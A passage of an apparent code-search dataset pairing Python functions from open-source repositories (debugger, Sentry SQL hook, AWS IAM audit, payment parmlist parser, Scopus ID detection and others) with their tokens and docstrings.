[ "def", "_parse_contract", "(", "self", ",", "player_info", ")", ":", "tables", "=", "player_info", "(", "'table'", ")", ".", "items", "(", ")", "for", "table", "in", "tables", ":", "id_attr", "=", "table", ".", "attr", "(", "'id'", ")", "if", "id_attr", ":", "if", "id_attr", ".", "startswith", "(", "'contracts_'", ")", ":", "years", "=", "self", ".", "_parse_contract_headers", "(", "table", ")", "wages", "=", "self", ".", "_parse_contract_wages", "(", "table", ")", "contract", "=", "self", ".", "_combine_contract", "(", "years", ",", "wages", ")", "# If the contract is empty, the player likely doesn't have", "# a contract and should have a value of None instead.", "if", "contract", "==", "{", "}", ":", "contract", "=", "None", "setattr", "(", "self", ",", "'_contract'", ",", "contract", ")", "break" ]
Parse the player's contract.

Depending on the player's contract status, a contract table is located
at the bottom of the stats page and includes player wages by season. If
found, create a dictionary housing the wages by season.

Parameters
----------
player_info : PyQuery object
    A PyQuery object containing the HTML from the player's stats page.
[ "Parse", "the", "player", "s", "contract", "." ]
python
train
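The id-prefix scan in _parse_contract can be exercised on its own; the HTML below is a made-up stand-in for a stats page, and the snippet assumes pyquery is installed.

from pyquery import PyQuery as pq

html = ('<div><table id="stats"></table>'
        '<table id="contracts_nba"></table></div>')
player_info = pq(html)
for table in player_info('table').items():
    id_attr = table.attr('id')
    if id_attr and id_attr.startswith('contracts_'):
        print('found contract table:', id_attr)   # -> contracts_nba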
fabioz/PyDev.Debugger
pydevd.py
https://github.com/fabioz/PyDev.Debugger/blob/ed9c4307662a5593b8a7f1f3389ecd0e79b8c503/pydevd.py#L1172-L1231
def set_suspend(self, thread, stop_reason, suspend_other_threads=False, is_pause=False):
    '''
    :param thread:
        The thread which should be suspended.

    :param stop_reason:
        Reason why the thread was suspended.

    :param suspend_other_threads:
        Whether to force other threads to be suspended (i.e.: when hitting
        a breakpoint with a suspend all threads policy).

    :param is_pause:
        If this is a pause to suspend all threads, any thread can be
        considered as the 'main' thread paused.
    '''
    self._threads_suspended_single_notification.increment_suspend_time()
    if is_pause:
        self._threads_suspended_single_notification.on_pause()

    info = self._mark_suspend(thread, stop_reason)

    if is_pause:
        # Must set tracing after setting the state to suspend.
        frame = info.get_topmost_frame(thread)
        if frame is not None:
            try:
                self.set_trace_for_frame_and_parents(frame)
            finally:
                frame = None

    # If conditional breakpoint raises any exception during evaluation send the details to the client.
    if stop_reason == CMD_SET_BREAK and info.conditional_breakpoint_exception is not None:
        conditional_breakpoint_exception_tuple = info.conditional_breakpoint_exception
        info.conditional_breakpoint_exception = None
        self._send_breakpoint_condition_exception(thread, conditional_breakpoint_exception_tuple)

    if not suspend_other_threads and self.multi_threads_single_notification:
        # In the mode which gives a single notification when all threads are
        # stopped, stop all threads whenever a set_suspend is issued.
        suspend_other_threads = True

    if suspend_other_threads:
        # Suspend all other threads.
        all_threads = pydevd_utils.get_non_pydevd_threads()
        for t in all_threads:
            if getattr(t, 'pydev_do_not_trace', None):
                pass  # skip some other threads, i.e. ipython history saving thread from debug console
            else:
                if t is thread:
                    continue

                info = self._mark_suspend(t, CMD_THREAD_SUSPEND)
                frame = info.get_topmost_frame(t)

                # Reset the time as in this case this was not the main thread suspended.
                if frame is not None:
                    try:
                        self.set_trace_for_frame_and_parents(frame)
                    finally:
                        frame = None
[ "def", "set_suspend", "(", "self", ",", "thread", ",", "stop_reason", ",", "suspend_other_threads", "=", "False", ",", "is_pause", "=", "False", ")", ":", "self", ".", "_threads_suspended_single_notification", ".", "increment_suspend_time", "(", ")", "if", "is_pause", ":", "self", ".", "_threads_suspended_single_notification", ".", "on_pause", "(", ")", "info", "=", "self", ".", "_mark_suspend", "(", "thread", ",", "stop_reason", ")", "if", "is_pause", ":", "# Must set tracing after setting the state to suspend.", "frame", "=", "info", ".", "get_topmost_frame", "(", "thread", ")", "if", "frame", "is", "not", "None", ":", "try", ":", "self", ".", "set_trace_for_frame_and_parents", "(", "frame", ")", "finally", ":", "frame", "=", "None", "# If conditional breakpoint raises any exception during evaluation send the details to the client.", "if", "stop_reason", "==", "CMD_SET_BREAK", "and", "info", ".", "conditional_breakpoint_exception", "is", "not", "None", ":", "conditional_breakpoint_exception_tuple", "=", "info", ".", "conditional_breakpoint_exception", "info", ".", "conditional_breakpoint_exception", "=", "None", "self", ".", "_send_breakpoint_condition_exception", "(", "thread", ",", "conditional_breakpoint_exception_tuple", ")", "if", "not", "suspend_other_threads", "and", "self", ".", "multi_threads_single_notification", ":", "# In the mode which gives a single notification when all threads are", "# stopped, stop all threads whenever a set_suspend is issued.", "suspend_other_threads", "=", "True", "if", "suspend_other_threads", ":", "# Suspend all other threads.", "all_threads", "=", "pydevd_utils", ".", "get_non_pydevd_threads", "(", ")", "for", "t", "in", "all_threads", ":", "if", "getattr", "(", "t", ",", "'pydev_do_not_trace'", ",", "None", ")", ":", "pass", "# skip some other threads, i.e. ipython history saving thread from debug console", "else", ":", "if", "t", "is", "thread", ":", "continue", "info", "=", "self", ".", "_mark_suspend", "(", "t", ",", "CMD_THREAD_SUSPEND", ")", "frame", "=", "info", ".", "get_topmost_frame", "(", "t", ")", "# Reset the time as in this case this was not the main thread suspended.", "if", "frame", "is", "not", "None", ":", "try", ":", "self", ".", "set_trace_for_frame_and_parents", "(", "frame", ")", "finally", ":", "frame", "=", "None" ]
:param thread: The thread which should be suspended.
:param stop_reason: Reason why the thread was suspended.
:param suspend_other_threads: Whether to force other threads to be
    suspended (i.e.: when hitting a breakpoint with a suspend all
    threads policy).
:param is_pause: If this is a pause to suspend all threads, any thread
    can be considered as the 'main' thread paused.
[ ":", "param", "thread", ":", "The", "thread", "which", "should", "be", "suspended", "." ]
python
train
getsentry/raven-python
raven/contrib/django/client.py
https://github.com/getsentry/raven-python/blob/d891c20f0f930153f508e9d698d9de42e910face/raven/contrib/django/client.py#L104-L142
def install_sql_hook():
    """If installed this causes Django's queries to be captured."""
    try:
        from django.db.backends.utils import CursorWrapper
    except ImportError:
        from django.db.backends.util import CursorWrapper

    try:
        real_execute = CursorWrapper.execute
        real_executemany = CursorWrapper.executemany
    except AttributeError:
        # XXX(mitsuhiko): On some very old django versions (<1.6) this
        # trickery would have to look different but I can't be bothered.
        return

    def record_many_sql(vendor, alias, start, sql, param_list):
        duration = time.time() - start
        for params in param_list:
            record_sql(vendor, alias, start, duration, sql, params)

    def execute(self, sql, params=None):
        start = time.time()
        try:
            return real_execute(self, sql, params)
        finally:
            record_sql(self.db.vendor, getattr(self.db, 'alias', None),
                       start, time.time() - start, sql, params)

    def executemany(self, sql, param_list):
        start = time.time()
        try:
            return real_executemany(self, sql, param_list)
        finally:
            record_many_sql(self.db.vendor, getattr(self.db, 'alias', None),
                            start, sql, param_list)

    CursorWrapper.execute = execute
    CursorWrapper.executemany = executemany
    breadcrumbs.ignore_logger('django.db.backends')
[ "def", "install_sql_hook", "(", ")", ":", "try", ":", "from", "django", ".", "db", ".", "backends", ".", "utils", "import", "CursorWrapper", "except", "ImportError", ":", "from", "django", ".", "db", ".", "backends", ".", "util", "import", "CursorWrapper", "try", ":", "real_execute", "=", "CursorWrapper", ".", "execute", "real_executemany", "=", "CursorWrapper", ".", "executemany", "except", "AttributeError", ":", "# XXX(mitsuhiko): On some very old django versions (<1.6) this", "# trickery would have to look different but I can't be bothered.", "return", "def", "record_many_sql", "(", "vendor", ",", "alias", ",", "start", ",", "sql", ",", "param_list", ")", ":", "duration", "=", "time", ".", "time", "(", ")", "-", "start", "for", "params", "in", "param_list", ":", "record_sql", "(", "vendor", ",", "alias", ",", "start", ",", "duration", ",", "sql", ",", "params", ")", "def", "execute", "(", "self", ",", "sql", ",", "params", "=", "None", ")", ":", "start", "=", "time", ".", "time", "(", ")", "try", ":", "return", "real_execute", "(", "self", ",", "sql", ",", "params", ")", "finally", ":", "record_sql", "(", "self", ".", "db", ".", "vendor", ",", "getattr", "(", "self", ".", "db", ",", "'alias'", ",", "None", ")", ",", "start", ",", "time", ".", "time", "(", ")", "-", "start", ",", "sql", ",", "params", ")", "def", "executemany", "(", "self", ",", "sql", ",", "param_list", ")", ":", "start", "=", "time", ".", "time", "(", ")", "try", ":", "return", "real_executemany", "(", "self", ",", "sql", ",", "param_list", ")", "finally", ":", "record_many_sql", "(", "self", ".", "db", ".", "vendor", ",", "getattr", "(", "self", ".", "db", ",", "'alias'", ",", "None", ")", ",", "start", ",", "sql", ",", "param_list", ")", "CursorWrapper", ".", "execute", "=", "execute", "CursorWrapper", ".", "executemany", "=", "executemany", "breadcrumbs", ".", "ignore_logger", "(", "'django.db.backends'", ")" ]
If installed this causes Django's queries to be captured.
[ "If", "installed", "this", "causes", "Django", "s", "queries", "to", "be", "captured", "." ]
python
train
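The wrap-and-time pattern behind install_sql_hook is plain monkeypatching: keep a reference to the real method, swap in a wrapper, and record timing in a finally block. A self-contained sketch with a stand-in cursor class (no Django needed):

import time

class Cursor:                      # stand-in for Django's CursorWrapper
    def execute(self, sql):
        time.sleep(0.01)           # pretend to run the query

real_execute = Cursor.execute      # keep the original

def execute(self, sql):
    start = time.time()
    try:
        return real_execute(self, sql)
    finally:                       # runs even if the query raises
        print('%s took %.3fs' % (sql, time.time() - start))

Cursor.execute = execute           # install the hook
Cursor().execute('SELECT 1')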
nccgroup/Scout2
AWSScout2/services/iam.py
https://github.com/nccgroup/Scout2/blob/5d86d46d7ed91a92000496189e9cfa6b98243937/AWSScout2/services/iam.py#L244-L270
def parse_users(self, user, params):
    """
    Parse a single IAM user and fetch additional data
    """
    if user['UserName'] in self.users:
        return
    api_client = params['api_client']
    # Ensure consistent attribute names across resource types
    user['id'] = user.pop('UserId')
    user['name'] = user.pop('UserName')
    user['arn'] = user.pop('Arn')
    policies = self.__get_inline_policies(api_client, 'user', user['id'], user['name'])
    if len(policies):
        user['inline_policies'] = policies
        user['inline_policies_count'] = len(policies)
    user['groups'] = []
    groups = handle_truncated_response(api_client.list_groups_for_user,
                                       {'UserName': user['name']},
                                       ['Groups'])['Groups']
    for group in groups:
        user['groups'].append(group['GroupName'])
    try:
        user['LoginProfile'] = api_client.get_login_profile(UserName = user['name'])['LoginProfile']
    except Exception as e:
        pass  # the user has no console login profile
    user['AccessKeys'] = api_client.list_access_keys(UserName = user['name'])['AccessKeyMetadata']
    user['MFADevices'] = api_client.list_mfa_devices(UserName = user['name'])['MFADevices']
    # TODO: users' signing certs
    self.users[user['id']] = user
[ "def", "parse_users", "(", "self", ",", "user", ",", "params", ")", ":", "if", "user", "[", "'UserName'", "]", "in", "self", ".", "users", ":", "return", "api_client", "=", "params", "[", "'api_client'", "]", "# Ensure consistent attribute names across resource types", "user", "[", "'id'", "]", "=", "user", ".", "pop", "(", "'UserId'", ")", "user", "[", "'name'", "]", "=", "user", ".", "pop", "(", "'UserName'", ")", "user", "[", "'arn'", "]", "=", "user", ".", "pop", "(", "'Arn'", ")", "policies", "=", "self", ".", "__get_inline_policies", "(", "api_client", ",", "'user'", ",", "user", "[", "'id'", "]", ",", "user", "[", "'name'", "]", ")", "if", "len", "(", "policies", ")", ":", "user", "[", "'inline_policies'", "]", "=", "policies", "user", "[", "'inline_policies_count'", "]", "=", "len", "(", "policies", ")", "user", "[", "'groups'", "]", "=", "[", "]", "groups", "=", "handle_truncated_response", "(", "api_client", ".", "list_groups_for_user", ",", "{", "'UserName'", ":", "user", "[", "'name'", "]", "}", ",", "[", "'Groups'", "]", ")", "[", "'Groups'", "]", "for", "group", "in", "groups", ":", "user", "[", "'groups'", "]", ".", "append", "(", "group", "[", "'GroupName'", "]", ")", "try", ":", "user", "[", "'LoginProfile'", "]", "=", "api_client", ".", "get_login_profile", "(", "UserName", "=", "user", "[", "'name'", "]", ")", "[", "'LoginProfile'", "]", "except", "Exception", "as", "e", ":", "pass", "user", "[", "'AccessKeys'", "]", "=", "api_client", ".", "list_access_keys", "(", "UserName", "=", "user", "[", "'name'", "]", ")", "[", "'AccessKeyMetadata'", "]", "user", "[", "'MFADevices'", "]", "=", "api_client", ".", "list_mfa_devices", "(", "UserName", "=", "user", "[", "'name'", "]", ")", "[", "'MFADevices'", "]", "# TODO: Users signing certss", "self", ".", "users", "[", "user", "[", "'id'", "]", "]", "=", "user" ]
Parse a single IAM user and fetch additional data
[ "Parse", "a", "single", "IAM", "user", "and", "fetch", "additional", "data" ]
python
train
bkeating/python-payflowpro
payflowpro/client.py
https://github.com/bkeating/python-payflowpro/blob/e74fc85135f171caa28277196fdcf7c7481ff298/payflowpro/client.py#L133-L174
def _parse_parmlist(self, parmlist):
    """ Parses a PARMLIST string into a dictionary of name and value
    pairs. The parsing is complicated by the following:

    - parameter keynames may or may not include a length
      specification
    - delimiter characters (=, &) may appear inside parameter
      values, provided the parameter has an explicit length.

    For example, the following parmlist values are possible:

      A=B&C=D
      A[1]=B&C[1]=D
      A=B&C[1]=D
      A[3]=B&B&C[1]=D (Here, the value of A is "B&B")
      A[1]=B&C[3]=D=7 (Here, the value of C is "D=7")
    """
    parmlist = "&" + parmlist
    name_re = re.compile(r'\&([A-Z0-9_]+)(\[\d+\])?=')

    results = {}
    offset = 0
    match = name_re.search(parmlist, offset)
    while match:
        name, len_suffix = match.groups()
        offset = match.end()
        if len_suffix:
            val_len = int(len_suffix[1:-1])
        else:
            next_match = name_re.search(parmlist, offset)
            if next_match:
                val_len = next_match.start() - match.end()
            else:
                # At end of parmlist
                val_len = len(parmlist) - match.end()

        value = parmlist[match.end() : match.end() + val_len]
        results[name.lower()] = value
        match = name_re.search(parmlist, offset)
    return results
[ "def", "_parse_parmlist", "(", "self", ",", "parmlist", ")", ":", "parmlist", "=", "\"&\"", "+", "parmlist", "name_re", "=", "re", ".", "compile", "(", "r'\\&([A-Z0-9_]+)(\\[\\d+\\])?='", ")", "results", "=", "{", "}", "offset", "=", "0", "match", "=", "name_re", ".", "search", "(", "parmlist", ",", "offset", ")", "while", "match", ":", "name", ",", "len_suffix", "=", "match", ".", "groups", "(", ")", "offset", "=", "match", ".", "end", "(", ")", "if", "len_suffix", ":", "val_len", "=", "int", "(", "len_suffix", "[", "1", ":", "-", "1", "]", ")", "else", ":", "next_match", "=", "name_re", ".", "search", "(", "parmlist", ",", "offset", ")", "if", "next_match", ":", "val_len", "=", "next_match", ".", "start", "(", ")", "-", "match", ".", "end", "(", ")", "else", ":", "# At end of parmlist", "val_len", "=", "len", "(", "parmlist", ")", "-", "match", ".", "end", "(", ")", "value", "=", "parmlist", "[", "match", ".", "end", "(", ")", ":", "match", ".", "end", "(", ")", "+", "val_len", "]", "results", "[", "name", ".", "lower", "(", ")", "]", "=", "value", "match", "=", "name_re", ".", "search", "(", "parmlist", ",", "offset", ")", "return", "results" ]
Parses a PARMLIST string into a dictionary of name and value pairs.
The parsing is complicated by the following:

- parameter keynames may or may not include a length specification
- delimiter characters (=, &) may appear inside parameter values,
  provided the parameter has an explicit length.

For example, the following parmlist values are possible:

  A=B&C=D
  A[1]=B&C[1]=D
  A=B&C[1]=D
  A[3]=B&B&C[1]=D (Here, the value of A is "B&B")
  A[1]=B&C[3]=D=7 (Here, the value of C is "D=7")
[ "Parses", "a", "PARMLIST", "string", "into", "a", "dictionary", "of", "name", "and", "value", "pairs", ".", "The", "parsing", "is", "complicated", "by", "the", "following", ":", "-", "parameter", "keynames", "may", "or", "may", "not", "include", "a", "length", "specification", "-", "delimiter", "characters", "(", "=", "&", ")", "may", "appear", "inside", "parameter", "values", "provided", "the", "parameter", "has", "an", "explicit", "length", ".", "For", "example", "the", "following", "parmlist", "values", "are", "possible", ":", "A", "=", "B&C", "=", "D", "A", "[", "1", "]", "=", "B&C", "[", "1", "]", "=", "D", "A", "=", "B&C", "[", "1", "]", "=", "D", "A", "[", "3", "]", "=", "B&B&C", "[", "1", "]", "=", "D", "(", "Here", "the", "value", "of", "A", "is", "B&B", ")", "A", "[", "1", "]", "=", "B&C", "[", "3", "]", "=", "D", "=", "7", "(", "Here", "the", "value", "of", "C", "is", "D", "=", "7", ")" ]
python
train
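The docstring's examples double as test vectors. Below is a standalone restatement of the same loop (identical regex, written as a module-level function for illustration), checked against them:

import re

def parse_parmlist(parmlist):
    parmlist = '&' + parmlist
    name_re = re.compile(r'\&([A-Z0-9_]+)(\[\d+\])?=')
    results, offset = {}, 0
    match = name_re.search(parmlist, offset)
    while match:
        name, len_suffix = match.groups()
        offset = match.end()
        if len_suffix:
            val_len = int(len_suffix[1:-1])          # explicit length given
        else:
            next_match = name_re.search(parmlist, offset)
            end = next_match.start() if next_match else len(parmlist)
            val_len = end - match.end()              # read up to the next key
        results[name.lower()] = parmlist[match.end():match.end() + val_len]
        match = name_re.search(parmlist, offset)
    return results

assert parse_parmlist('A[3]=B&B&C[1]=D') == {'a': 'B&B', 'c': 'D'}
assert parse_parmlist('A[1]=B&C[3]=D=7') == {'a': 'B', 'c': 'D=7'}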
ChristianKuehnel/btlewrap
btlewrap/gatttool.py
https://github.com/ChristianKuehnel/btlewrap/blob/1b7aec934529dcf03f5ecdccd0b09c25c389974f/btlewrap/gatttool.py#L19-L27
def wrap_exception(func: Callable) -> Callable:
    """Wrap all IOErrors to BluetoothBackendException"""

    def _func_wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except IOError as exception:
            raise BluetoothBackendException() from exception
    return _func_wrapper
[ "def", "wrap_exception", "(", "func", ":", "Callable", ")", "->", "Callable", ":", "def", "_func_wrapper", "(", "*", "args", ",", "*", "*", "kwargs", ")", ":", "try", ":", "return", "func", "(", "*", "args", ",", "*", "*", "kwargs", ")", "except", "IOError", "as", "exception", ":", "raise", "BluetoothBackendException", "(", ")", "from", "exception", "return", "_func_wrapper" ]
Wrap all IOErrors to BluetoothBackendException
[ "Wrap", "all", "IOErrors", "to", "BluetoothBackendException" ]
python
train
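Usage sketch for wrap_exception: the decorated function below is hypothetical, and the import path assumes BluetoothBackendException lives in btlewrap.base as elsewhere in the package.

from btlewrap.base import BluetoothBackendException

@wrap_exception
def read_handle(handle: int) -> bytes:
    raise IOError('device went away')    # stand-in for a real gatttool call

try:
    read_handle(0x38)
except BluetoothBackendException as exc:
    print('wrapped:', exc.__cause__)     # original IOError kept via `raise ... from`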
codelv/enaml-native
src/enamlnative/android/android_view.py
https://github.com/codelv/enaml-native/blob/c33986e9eda468c508806e0a3e73c771401e5718/src/enamlnative/android/android_view.py#L330-L359
def set_layout(self, layout):
    """ Sets the LayoutParams of this widget.

    Since the available properties that may be set for the layout params
    depend on the parent, actual creation of the params is delegated to
    the parent.

    Parameters
    ----------
    layout: Dict
        A dict of layout parameters the parent should use to lay out
        this child. The widget defaults are updated with user passed
        values.

    """
    # Update the layout with the widget defaults
    update = self.layout_params is not None
    params = self.default_layout.copy()
    params.update(layout)

    # Create the layout params
    parent = self.parent()
    if not isinstance(parent, AndroidView):
        # Root node
        parent = self
        update = True
    parent.apply_layout(self, params)
    if update:
        self.widget.setLayoutParams(self.layout_params)
[ "def", "set_layout", "(", "self", ",", "layout", ")", ":", "# Update the layout with the widget defaults", "update", "=", "self", ".", "layout_params", "is", "not", "None", "params", "=", "self", ".", "default_layout", ".", "copy", "(", ")", "params", ".", "update", "(", "layout", ")", "# Create the layout params", "parent", "=", "self", ".", "parent", "(", ")", "if", "not", "isinstance", "(", "parent", ",", "AndroidView", ")", ":", "# Root node", "parent", "=", "self", "update", "=", "True", "parent", ".", "apply_layout", "(", "self", ",", "params", ")", "if", "update", ":", "self", ".", "widget", ".", "setLayoutParams", "(", "self", ".", "layout_params", ")" ]
Sets the LayoutParams of this widget.

Since the available properties that may be set for the layout params
depend on the parent, actual creation of the params is delegated to
the parent.

Parameters
----------
layout: Dict
    A dict of layout parameters the parent should use to lay out this
    child. The widget defaults are updated with user passed values.
[ "Sets", "the", "LayoutParams", "of", "this", "widget", ".", "Since", "the", "available", "properties", "that", "may", "be", "set", "for", "the", "layout", "params", "depends", "on", "the", "parent", "actual", "creation", "of", "the", "params", "is", "delegated", "to", "the", "parent", "Parameters", "----------", "layout", ":", "Dict", "A", "dict", "of", "layout", "parameters", "the", "parent", "should", "used", "to", "layout", "this", "child", ".", "The", "widget", "defaults", "are", "updated", "with", "user", "passed", "values", "." ]
python
train
intel-analytics/BigDL
pyspark/bigdl/optim/optimizer.py
https://github.com/intel-analytics/BigDL/blob/e9c19788285986ab789a2e2998f9a85d7524779f/pyspark/bigdl/optim/optimizer.py#L1009-L1023
def set_validation(self, batch_size, X_val, Y_val, trigger, val_method=None):
    """
    Configure validation settings.

    :param batch_size: validation batch size
    :param X_val: features of validation dataset
    :param Y_val: label of validation dataset
    :param trigger: validation interval
    :param val_method: the ValidationMethod to use, e.g. "Top1Accuracy",
           "Top5Accuracy", "Loss"
    """
    if val_method is None:
        val_method = [Top1Accuracy()]
    callBigDlFunc(self.bigdl_type, "setValidation", self.value, batch_size,
                  trigger, [JTensor.from_ndarray(X) for X in to_list(X_val)],
                  JTensor.from_ndarray(Y_val), to_list(val_method))
[ "def", "set_validation", "(", "self", ",", "batch_size", ",", "X_val", ",", "Y_val", ",", "trigger", ",", "val_method", "=", "None", ")", ":", "if", "val_method", "is", "None", ":", "val_method", "=", "[", "Top1Accuracy", "(", ")", "]", "callBigDlFunc", "(", "self", ".", "bigdl_type", ",", "\"setValidation\"", ",", "self", ".", "value", ",", "batch_size", ",", "trigger", ",", "[", "JTensor", ".", "from_ndarray", "(", "X", ")", "for", "X", "in", "to_list", "(", "X_val", ")", "]", ",", "JTensor", ".", "from_ndarray", "(", "Y_val", ")", ",", "to_list", "(", "val_method", ")", ")" ]
Configure validation settings.

:param batch_size: validation batch size
:param X_val: features of validation dataset
:param Y_val: label of validation dataset
:param trigger: validation interval
:param val_method: the ValidationMethod to use, e.g. "Top1Accuracy",
    "Top5Accuracy", "Loss"
[ "Configure", "validation", "settings", "." ]
python
test
aholkner/bacon
native/Vendor/FreeType/src/tools/glnames.py
https://github.com/aholkner/bacon/blob/edf3810dcb211942d392a8637945871399b0650d/native/Vendor/FreeType/src/tools/glnames.py#L5171-L5183
def filter_glyph_names(alist, filter):
    """filter `alist' by taking _out_ all glyph names that are in `filter'"""

    count = 0
    extras = []

    for name in alist:
        try:
            filtered_index = filter.index(name)
        except ValueError:  # list.index raises ValueError when `name` is absent
            extras.append(name)

    return extras
[ "def", "filter_glyph_names", "(", "alist", ",", "filter", ")", ":", "count", "=", "0", "extras", "=", "[", "]", "for", "name", "in", "alist", ":", "try", ":", "filtered_index", "=", "filter", ".", "index", "(", "name", ")", "except", ":", "extras", ".", "append", "(", "name", ")", "return", "extras" ]
filter `alist' by taking _out_ all glyph names that are in `filter'
[ "filter", "alist", "by", "taking", "_out_", "all", "glyph", "names", "that", "are", "in", "filter" ]
python
test
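A quick demonstration, plus a set-based equivalent: the index()/except scan above is O(len(alist) * len(filter)), which adds up for the full AGLFN list.

aglfn = ['A', 'B', 'Adieresis']
mac_extras = ['Adieresis']
print(filter_glyph_names(aglfn, mac_extras))   # -> ['A', 'B']

filter_set = set(mac_extras)                   # O(1) membership tests
extras = [name for name in aglfn if name not in filter_set]
assert extras == ['A', 'B']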
ZeitOnline/briefkasten
application/briefkasten/dropbox.py
https://github.com/ZeitOnline/briefkasten/blob/ce6b6eeb89196014fe21d68614c20059d02daa11/application/briefkasten/dropbox.py#L376-L382
def replies(self):
    """ returns a list of strings """
    fs_reply_path = join(self.fs_replies_path, 'message_001.txt')
    if exists(fs_reply_path):
        return [load(open(fs_reply_path, 'r'))]
    else:
        return []
[ "def", "replies", "(", "self", ")", ":", "fs_reply_path", "=", "join", "(", "self", ".", "fs_replies_path", ",", "'message_001.txt'", ")", "if", "exists", "(", "fs_reply_path", ")", ":", "return", "[", "load", "(", "open", "(", "fs_reply_path", ",", "'r'", ")", ")", "]", "else", ":", "return", "[", "]" ]
returns a list of strings
[ "returns", "a", "list", "of", "strings" ]
python
valid
mixmastamyk/console
console/detection.py
https://github.com/mixmastamyk/console/blob/afe6c95d5a7b83d85376f450454e3769e4a5c3d0/console/detection.py#L336-L344
def is_a_tty(stream=sys.stdout):
    ''' Detect terminal or something else, such as output redirection.

        Returns:
            Boolean, None: is tty or None if not found.
    '''
    result = stream.isatty() if hasattr(stream, 'isatty') else None
    log.debug(result)
    return result
[ "def", "is_a_tty", "(", "stream", "=", "sys", ".", "stdout", ")", ":", "result", "=", "stream", ".", "isatty", "(", ")", "if", "hasattr", "(", "stream", ",", "'isatty'", ")", "else", "None", "log", ".", "debug", "(", "result", ")", "return", "result" ]
Detect terminal or something else, such as output redirection.

Returns:
    Boolean, None: is tty or None if not found.
[ "Detect", "terminal", "or", "something", "else", "such", "as", "output", "redirection", "." ]
python
train
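Runnable spot checks covering all three outcomes, assuming the console package is importable:

import io, sys
print(is_a_tty(sys.stdout))      # True in a terminal, False when piped
print(is_a_tty(io.StringIO()))   # False: StringIO has isatty(), which returns False
print(is_a_tty(object()))        # None: no isatty attribute at all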
IdentityPython/oidcendpoint
src/oidcendpoint/userinfo.py
https://github.com/IdentityPython/oidcendpoint/blob/6c1d729d51bfb6332816117fe476073df7a1d823/src/oidcendpoint/userinfo.py#L164-L188
def userinfo_in_id_token_claims(endpoint_context, session, def_itc=None):
    """
    Collect user info claims that are to be placed in the id token.

    :param endpoint_context: Endpoint context
    :param session: Session information
    :param def_itc: Default ID Token claims
    :return: User information or None
    """
    if def_itc:
        itc = def_itc
    else:
        itc = {}

    itc.update(id_token_claims(session))

    if not itc:
        return None

    _claims = by_schema(endpoint_context.id_token_schema, **itc)
    if _claims:
        return collect_user_info(endpoint_context, session, _claims)
    else:
        return None
[ "def", "userinfo_in_id_token_claims", "(", "endpoint_context", ",", "session", ",", "def_itc", "=", "None", ")", ":", "if", "def_itc", ":", "itc", "=", "def_itc", "else", ":", "itc", "=", "{", "}", "itc", ".", "update", "(", "id_token_claims", "(", "session", ")", ")", "if", "not", "itc", ":", "return", "None", "_claims", "=", "by_schema", "(", "endpoint_context", ".", "id_token_schema", ",", "*", "*", "itc", ")", "if", "_claims", ":", "return", "collect_user_info", "(", "endpoint_context", ",", "session", ",", "_claims", ")", "else", ":", "return", "None" ]
Collect user info claims that are to be placed in the id token.

:param endpoint_context: Endpoint context
:param session: Session information
:param def_itc: Default ID Token claims
:return: User information or None
[ "Collect", "user", "info", "claims", "that", "are", "to", "be", "placed", "in", "the", "id", "token", "." ]
python
train
scopus-api/scopus
scopus/utils/get_content.py
https://github.com/scopus-api/scopus/blob/27ce02dd3095bfdab9d3e8475543d7c17767d1ab/scopus/utils/get_content.py#L12-L49
def detect_id_type(sid):
    """Method that tries to infer the type of abstract ID.

    Parameters
    ----------
    sid : str
        The ID of an abstract on Scopus.

    Raises
    ------
    ValueError
        If the ID type cannot be inferred.

    Notes
    -----
    PII usually has 17 chars, but in Scopus there are valid cases with
    only 16 for old converted articles.

    Scopus ID contains only digits, but it can have leading zeros.  If
    ID with leading zeros is treated as a number, SyntaxError can occur,
    or the ID will be rendered invalid and the type will be
    misinterpreted.
    """
    sid = str(sid)
    if not sid.isnumeric():
        if sid.startswith('2-s2.0-'):
            id_type = 'eid'
        elif '/' in sid:
            id_type = 'doi'
        elif 16 <= len(sid) <= 17:
            id_type = 'pii'
        else:
            # Originally the failure case sat in an unreachable `else` on the
            # outer if/elif, leaving id_type unbound here; raise directly.
            raise ValueError('ID type detection failed for \'{}\'.'.format(sid))
    else:
        if len(sid) < 10:
            id_type = 'pubmed_id'
        else:
            id_type = 'scopus_id'
    return id_type
[ "def", "detect_id_type", "(", "sid", ")", ":", "sid", "=", "str", "(", "sid", ")", "if", "not", "sid", ".", "isnumeric", "(", ")", ":", "if", "sid", ".", "startswith", "(", "'2-s2.0-'", ")", ":", "id_type", "=", "'eid'", "elif", "'/'", "in", "sid", ":", "id_type", "=", "'doi'", "elif", "16", "<=", "len", "(", "sid", ")", "<=", "17", ":", "id_type", "=", "'pii'", "elif", "sid", ".", "isnumeric", "(", ")", ":", "if", "len", "(", "sid", ")", "<", "10", ":", "id_type", "=", "'pubmed_id'", "else", ":", "id_type", "=", "'scopus_id'", "else", ":", "raise", "ValueError", "(", "'ID type detection failed for \\'{}\\'.'", ".", "format", "(", "sid", ")", ")", "return", "id_type" ]
Method that tries to infer the type of abstract ID.

Parameters
----------
sid : str
    The ID of an abstract on Scopus.

Raises
------
ValueError
    If the ID type cannot be inferred.

Notes
-----
PII usually has 17 chars, but in Scopus there are valid cases with only
16 for old converted articles.

Scopus ID contains only digits, but it can have leading zeros. If ID
with leading zeros is treated as a number, SyntaxError can occur, or
the ID will be rendered invalid and the type will be misinterpreted.
[ "Method", "that", "tries", "to", "infer", "the", "type", "of", "abstract", "ID", "." ]
python
train
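Spot checks for each branch; the IDs below are synthetic values shaped like the documented formats, not real publications.

print(detect_id_type('2-s2.0-85040230676'))           # eid
print(detect_id_type('10.1016/j.softx.2019.100263'))  # doi (contains '/')
print(detect_id_type('S2352711019300573'))            # pii (17 chars, not numeric)
print(detect_id_type('315367890'))                    # pubmed_id (9 digits)
print(detect_id_type('85040230676'))                  # scopus_id (11 digits)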
JelleAalbers/multihist
multihist.py
https://github.com/JelleAalbers/multihist/blob/072288277f807e7e388fdf424c3921c80576f3ab/multihist.py#L167-L171
def density(self):
    """Gives empirical PDF, like np.histogram(...., density=True)"""
    h = self.histogram.astype(float)  # was np.float, which NumPy 1.24+ removed
    bindifs = np.array(np.diff(self.bin_edges), float)
    return h / (bindifs * self.n)
[ "def", "density", "(", "self", ")", ":", "h", "=", "self", ".", "histogram", ".", "astype", "(", "np", ".", "float", ")", "bindifs", "=", "np", ".", "array", "(", "np", ".", "diff", "(", "self", ".", "bin_edges", ")", ",", "float", ")", "return", "h", "/", "(", "bindifs", "*", "self", ".", "n", ")" ]
Gives empirical PDF, like np.histogram(...., density=True)
